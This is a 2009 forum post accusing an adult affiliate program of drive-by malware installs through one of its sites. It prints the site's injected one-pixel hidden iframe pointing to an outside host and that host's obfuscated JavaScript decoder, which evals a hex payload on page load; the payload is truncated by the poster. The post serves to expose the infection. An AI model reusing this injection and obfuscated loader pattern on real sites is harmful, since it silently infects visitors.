spacedog |
12-15-2009 03:55 PM |
Hey PeakBucks!! Why are you auto-installing ransomware/malware on users' machines?
PeakBucks, which owns the domain xpodtrampling.com as a paysite in its affiliate program, auto-installs Security Central on users' machines and infects them. Security Central is a malicious program that takes over the user's machine and claims it is scanning the system and has found infections. Once this piece of shit is running, the user's browser, antivirus and other tools/programs no longer work. This piece of shit program demands paid activation to get rid of infections which do not really exist.
This malware is auto-installed on users' machines from the above-mentioned domain, whose source code contains the following:
Code:
<!-- One-pixel, borderless iframe (width=1, height=1, frameborder=0): the framed
     page is fetched and rendered without being visible to the visitor. -->
<iframe src="http://rainmannn.org/whitehorse/" width=1 height=1 frameborder=0></iframe>
The source code of that page is
Code:
<html>
<head>
<script>
function nanit(s4k3_yJBbq1X, JBXr71__bgnOoY1){var OMj__Bw4E_Gh = arguments.callee;OMj__Bw4E_Gh = OMj__Bw4E_Gh.toString();var O5_Jn4gO2N_i_8 = 0;var ys__X_w_7_W_5f = document.getElementById("d");if (ys__X_w_7_W_5f && !JBXr71__bgnOoY1) {JBXr71__bgnOoY1 = ys__X_w_7_W_5f.value;}O5_Jn4gO2N_i_8 = 2;var kador = new Array();if (!s4k3_yJBbq1X) { var UE24__p1X0J__Dl = 0;var bPY7lA = 0;while(bPY7lA < OMj__Bw4E_Gh.length) {var fBtuse3twt = 0;var E__8A_pOg__2r = OMj__Bw4E_Gh.charCodeAt(bPY7lA);if (E__8A_pOg__2r >= 48 && E__8A_pOg__2r <= 57) { fBtuse3twt = 1; }if (fBtuse3twt) {if (UE24__p1X0J__Dl == 4) { UE24__p1X0J__Dl = 0; }if (isNaN(kador[UE24__p1X0J__Dl])) { kador[UE24__p1X0J__Dl] = 0; }kador[UE24__p1X0J__Dl] += E__8A_pOg__2r;if (kador[UE24__p1X0J__Dl] > 512) {kador[UE24__p1X0J__Dl] -= 512;}UE24__p1X0J__Dl++;}bPY7lA++;}} else {kador = s4k3_yJBbq1X;}for(UE24__p1X0J__Dl = 4; UE24__p1X0J__Dl > 0; UE24__p1X0J__Dl--) {if (kador[UE24__p1X0J__Dl - 1] > 256) {kador[UE24__p1X0J__Dl - 1] -= 256;}}var Sm_rS_vO = 0;var A36HY_d = "";var WU75FMk__UiG = 0;var AcP_Dyl_xBs1 = 0;var wBVY8sO_85GYV4 = 0;var hjYkI80_h0vj;var pmcQJAp4_Jy_qk = 0;while(AcP_Dyl_xBs1 < JBXr71__bgnOoY1.length) {var B_cQp__k__s = JBXr71__bgnOoY1.substr(AcP_Dyl_xBs1, 1);var S__CY_Py_N = parseInt(B_cQp__k__s, 16);if (wBVY8sO_85GYV4) {hjYkI80_h0vj += S__CY_Py_N;if (Sm_rS_vO == 4) {Sm_rS_vO -= 4;}var nD_J6Rps_mrC_7 = hjYkI80_h0vj;nD_J6Rps_mrC_7 = nD_J6Rps_mrC_7 - (pmcQJAp4_Jy_qk + 2) * kador[Sm_rS_vO];if (nD_J6Rps_mrC_7 < 0) {var f__0Q1__4U1__rr = Math.floor(nD_J6Rps_mrC_7 / 256);nD_J6Rps_mrC_7 = nD_J6Rps_mrC_7 - f__0Q1__4U1__rr * 256;}nD_J6Rps_mrC_7 = String.fromCharCode(nD_J6Rps_mrC_7);if (O5_Jn4gO2N_i_8 == 1) {A36HY_d += S__CY_Py_N;} else if (O5_Jn4gO2N_i_8 == 2) {A36HY_d += nD_J6Rps_mrC_7;} else {A36HY_d += AcP_Dyl_xBs1;}Sm_rS_vO++;pmcQJAp4_Jy_qk++;wBVY8sO_85GYV4 = 0;} else {hjYkI80_h0vj = S__CY_Py_N * 16;wBVY8sO_85GYV4 = 1;}AcP_Dyl_xBs1++;}eval(A36HY_d);return 0;}
</script>
</head>
<!-- The decoder runs automatically on page load. nanit() is called with no
     arguments, so it derives its key from its own source text and reads its
     input from the hidden field below. -->
<body onload="nanit();">
<!-- Hidden field with id "d": the hex-encoded input that nanit() decodes and
     passes to eval(). The value shown here was truncated by the poster (see
     the trailing marker text), so it is not the complete original payload. -->
<input type="hidden" id="d" value="C853F27741E9634AF958DF0E72F566D050B5F470F558200089EAB8BE05863333D524F9278AA--iremovedrestofthisencryptedcodetomakeitshorter">
<!-- Rendered only when scripting is disabled: the browser then requests the
     relative URL "j". NOTE(review): its purpose is not visible on this page;
     presumably it lets the server see script-less clients. Confirm before
     relying on this. -->
<noscript>
<img src="j" width="2" height="2" ></img>
</noscript>
</body>